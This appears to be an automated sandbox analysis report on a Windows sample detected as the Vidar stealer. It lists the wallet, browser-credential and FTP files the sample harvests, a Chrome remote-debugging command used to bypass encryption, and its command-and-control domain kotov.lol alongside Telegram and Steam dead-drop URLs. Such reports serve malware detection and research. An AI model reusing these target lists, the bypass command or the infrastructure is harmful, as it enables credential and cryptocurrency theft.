          Source: file.exe, 00000000.00000002.2492376383.00000000004AE000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: |Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
          Source: file.exe, 00000000.00000002.2492376383.00000000004AE000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: |Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
          Tries to harvest and steal Bitcoin Wallet information
          Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-coreJump to behavior
          Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
          Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\ConfigurationJump to behavior
          Tries to harvest and steal browser information (history, passwords, etc)
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\3561288849sdhlie.files\key4.dbJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\tmp\key4.dbJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\2918063365piupsah.files\key4.dbJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\key4.dbJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\db\key4.dbJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\events\key4.dbJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\minidumps\key4.dbJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\saved-telemetry-pings\key4.dbJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.files\key4.dbJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.files\key4.dbJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.jsJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\key4.dbJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\pending_pings\key4.dbJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\key4.dbJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\key4.dbJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\crashes\key4.dbJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\key4.dbJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\bookmarkbackups\key4.dbJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.dbJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.files\key4.dbJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\temporary\key4.dbJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\security_state\key4.dbJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\archived\2023-10\key4.dbJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\to-be-removed\key4.dbJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\key4.dbJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\key4.dbJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.files\key4.dbJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\z6bny8rn.default\key4.dbJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\crashes\events\key4.dbJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\archived\key4.dbJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\sessionstore-backups\key4.dbJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\default\key4.dbJump to behavior
          Tries to harvest and steal ftp login credentials
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xmlJump to behavior
          Tries to steal Crypto Currency Wallets
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\Jump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\Jump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\backups\Jump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\Jump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\MultiDoge\Jump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\Jump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Binance\Jump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\Jump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\Jump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Jump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\config\Jump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\Jump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\Jump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\Jump to behavior
          Source: Yara matchFile source: Process Memory Space: file.exe PID: 6976, type: MEMORYSTR

          Remote Access Functionality

          barindex
          Attempt to bypass Chrome Application-Bound Encryption
          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
          Yara detected Vidar stealer
          Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
          Source: Yara matchFile source: 00000000.00000002.2492376383.00000000004AE000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: file.exe PID: 6976, type: MEMORYSTR

          Mitre Att&ck Matrix

          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
          Command and Scripting Interpreter          		1
          Create Account          		2
          Process Injection          		1
          Masquerading          		2
          OS Credential Dumping          		1
          Query Registry          		Remote Services4
          Data from Local System          		1
          Encrypted Channel          		Exfiltration Over Other Network MediumAbuse Accessibility Features
          CredentialsDomainsDefault AccountsScheduled Task/Job1
          DLL Side-Loading          		1
          DLL Side-Loading          		24
          Virtualization/Sandbox Evasion          		1
          Credentials in Registry          		751
          Security Software Discovery          		Remote Desktop ProtocolData from Removable Media1
          Remote Access Software          		Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)2
          Process Injection          		Security Account Manager24
          Virtualization/Sandbox Evasion          		SMB/Windows Admin SharesData from Network Shared Drive1
          Ingress Tool Transfer          		Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
          Obfuscated Files or Information          		NTDS2
          Process Discovery          		Distributed Component Object ModelInput Capture3
          Non-Application Layer Protocol          		Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script12
          Software Packing          		LSA Secrets1
          File and Directory Discovery          		SSHKeylogging4
          Application Layer Protocol          		Scheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
          DLL Side-Loading          		Cached Domain Credentials223
          System Information Discovery          		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          file.exe37%ReversingLabsWin32.Trojan.Symmi
          file.exe100%AviraTR/Crypt.XPACK.Gen
          file.exe100%Joe Sandbox ML

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          No Antivirus matches

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          https://kotov.loltosh;0%Avira URL Cloudsafe
          https://kotov.lol/x100%Avira URL Cloudmalware
          https://kotov.lol/ci100%Avira URL Cloudmalware
          https://kotov.lols92o4p.default-release_history.dbles0%Avira URL Cloudsafe
          https://kotov.lollet.keysing0%Avira URL Cloudsafe
          https://kotov.lol/Ai/100%Avira URL Cloudmalware
          https://kotov.lol/KJJJKFIIIJJJ100%Avira URL Cloudmalware
          https://kotov.lol/?ii100%Avira URL Cloudmalware
          https://kotov.lol/n100%Avira URL Cloudmalware
          https://kotov.lol/100%Avira URL Cloudmalware
          https://kotov.lolFHIIIJJJ0%Avira URL Cloudsafe
          https://kotov.lol/ui3100%Avira URL Cloudmalware
          https://kotov.lol/1D100%Avira URL Cloudmalware
          https://kotov.lol100%Avira URL Cloudmalware
          https://kotov.lol/2100%Avira URL Cloudmalware
          https://kotov.lol/4100%Avira URL Cloudmalware
          https://kotov.lol/L100%Avira URL Cloudmalware
          https://kotov.lol/oi9100%Avira URL Cloudmalware
          https://kotov.lol/Z100%Avira URL Cloudmalware
          https://kotov.lolHCIIIJJJng0%Avira URL Cloudsafe
          https://kotov.lolRPUCVcfCp3YWxsZXQqLiosKnNlZWQqLiosKmJ0YyouKiwqa2V5Ki4qLCoyZmEqLiosKmNyeXB0byouKiwqY0%Avira URL Cloudsafe
          https://kotov.lolECAAKKFH0%Avira URL Cloudsafe
          https://kotov.lol/rs100%Avira URL Cloudmalware
          https://kotov.lol/.100%Avira URL Cloudmalware

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          plus.l.google.com
          		172.217.17.78
          		truefalse
            		high
            t.me
            		149.154.167.99
            		truefalse
              		high
              www.google.com
              		142.250.181.100
              		truefalse
                		high
                kotov.lol
                		95.217.25.228
                		truetrue
                  		unknown
                  apis.google.com
                  		unknown
                  		unknownfalse
                    		high

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    https://kotov.lol/true
                    • Avira URL Cloud: malware
                    		unknown
                    https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0false
                      		high
                      https://www.google.com/async/newtab_promosfalse
                        		high
                        https://t.me/gv4dlpfalse
                          		high
                          https://www.google.com/async/ddljson?async=ntp:2false
                            		high
                            https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgwfalse
                              		high

                              URLs from Memory and Binaries

                              NameSourceMaliciousAntivirus DetectionReputation
                              https://t.me/cVfile.exe, 00000000.00000002.2493161809.0000000000D91000.00000004.00000020.00020000.00000000.sdmpfalse
                                		high
                                https://duckduckgo.com/chrome_newtabJEHJKJ.0.drfalse
                                  		high
                                  https://t.me/file.exe, 00000000.00000002.2493161809.0000000000D91000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		high
                                    https://duckduckgo.com/ac/?q=JEHJKJ.0.drfalse
                                      		high
                                      http://www.broofa.comchromecache_72.4.drfalse
                                        		high
                                        https://t.me/gv4dlpIfile.exe, 00000000.00000002.2493161809.0000000000DA6000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		high
                                          https://web.telegram.orgfile.exe, 00000000.00000003.1751381712.0000000000DD4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2492376383.000000000047B000.00000040.00000001.01000000.00000003.sdmpfalse
                                            		high
                                            https://kotov.lol/Ai/file.exe, 00000000.00000003.1784272680.0000000000DD3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1858814193.0000000000DD3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2493161809.0000000000DC3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1809760612.0000000000DD2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1834253831.0000000000DD3000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: malware
                                            		unknown
                                            https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.file.exe, 00000000.00000002.2494877300.0000000005B98000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2495560778.0000000005EB5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2496468955.00000000060BE000.00000004.00000020.00020000.00000000.sdmp, JEHIJD.0.drfalse
                                              		high
                                              https://kotov.lol/cifile.exe, 00000000.00000003.1784272680.0000000000DD3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1858814193.0000000000DD3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1809760612.0000000000DD2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1834253831.0000000000DD3000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: malware
                                              		unknown
                                              https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=JEHJKJ.0.drfalse
                                                		high
                                                https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17file.exe, 00000000.00000002.2494877300.0000000005ADA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1985870675.0000000005ABA000.00000004.00000020.00020000.00000000.sdmp, IJDBKK.0.drfalse
                                                  		high
                                                  https://steamcommunity.com/profiles/76561199803837316g88paMozilla/5.0file.exe, 00000000.00000003.1724777363.0000000004A10000.00000004.00001000.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://kotov.lol/xfile.exe, 00000000.00000002.2493161809.0000000000DC3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: malware
                                                    		unknown
                                                    https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYiJEHIJD.0.drfalse
                                                      		high
                                                      https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Installfile.exe, 00000000.00000002.2494877300.0000000005AB6000.00000004.00000020.00020000.00000000.sdmp, IJDBKK.0.drfalse
                                                        		high
                                                        https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchJEHJKJ.0.drfalse
                                                          		high
                                                          https://kotov.lol/KJJJKFIIIJJJfile.exe, 00000000.00000002.2493161809.0000000000DC3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: malware
                                                          		unknown
                                                          https://kotov.lol/nfile.exe, 00000000.00000003.1809760612.0000000000DD2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: malware
                                                          		unknown
                                                          https://kotov.lollet.keysingfile.exe, 00000000.00000002.2492376383.00000000005A1000.00000040.00000001.01000000.00000003.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          https://kotov.lols92o4p.default-release_history.dblesfile.exe, 00000000.00000002.2492376383.00000000004EE000.00000040.00000001.01000000.00000003.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          https://apis.google.comchromecache_72.4.drfalse
                                                            		high
                                                            https://kotov.loltosh;file.exe, 00000000.00000002.2492376383.00000000005A1000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000002.2492376383.000000000047B000.00000040.00000001.01000000.00000003.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            https://support.mozilla.org/products/firefoxgro.allfile.exe, 00000000.00000002.2496772342.000000000631C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://steamcommunity.com/profiles/76561199803837316file.exe, 00000000.00000002.2492376383.0000000000401000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.1724777363.0000000004A10000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94file.exe, 00000000.00000002.2494877300.0000000005B98000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2495560778.0000000005EB5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2496468955.00000000060BE000.00000004.00000020.00020000.00000000.sdmp, JEHIJD.0.drfalse
                                                                  		high
                                                                  https://kotov.lol/?iifile.exe, 00000000.00000003.1858814193.0000000000DD3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1834253831.0000000000DD3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: malware
                                                                  		unknown
                                                                  https://kotov.lol/Zfile.exe, 00000000.00000003.1858814193.0000000000DD3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: malware
                                                                  		unknown
                                                                  https://kotov.lolFHIIIJJJfile.exe, 00000000.00000002.2492376383.00000000004EE000.00000040.00000001.01000000.00000003.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpgfile.exe, 00000000.00000002.2494877300.0000000005B98000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2495560778.0000000005EB5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2496468955.00000000060BE000.00000004.00000020.00020000.00000000.sdmp, JEHIJD.0.drfalse
                                                                    		high
                                                                    https://www.google.com/images/branding/product/ico/googleg_lodp.icoJEHJKJ.0.drfalse
                                                                      		high
                                                                      https://kotov.lol/oi9file.exe, 00000000.00000003.1784272680.0000000000DD3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2493161809.0000000000DC3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1809760612.0000000000DD2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: malware
                                                                      		unknown
                                                                      https://kotov.lol/ui3file.exe, 00000000.00000003.1784272680.0000000000DD3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1858814193.0000000000DD3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2493161809.0000000000DC3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1809760612.0000000000DD2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1834253831.0000000000DD3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: malware
                                                                      		unknown
                                                                      https://kotov.lol/Lfile.exe, 00000000.00000002.2493161809.0000000000DC3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: malware
                                                                      		unknown
                                                                      https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=JEHJKJ.0.drfalse
                                                                        		high
                                                                        https://kotov.lolfile.exe, 00000000.00000002.2492376383.000000000047B000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.1809760612.0000000000DD2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1834253831.0000000000DD3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: malware
                                                                        		unknown
                                                                        https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&ctafile.exe, 00000000.00000002.2494877300.0000000005B98000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2495560778.0000000005EB5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2496468955.00000000060BE000.00000004.00000020.00020000.00000000.sdmp, JEHIJD.0.drfalse
                                                                          		high
                                                                          http://upx.sf.netAmcache.hve.9.drfalse
                                                                            		high
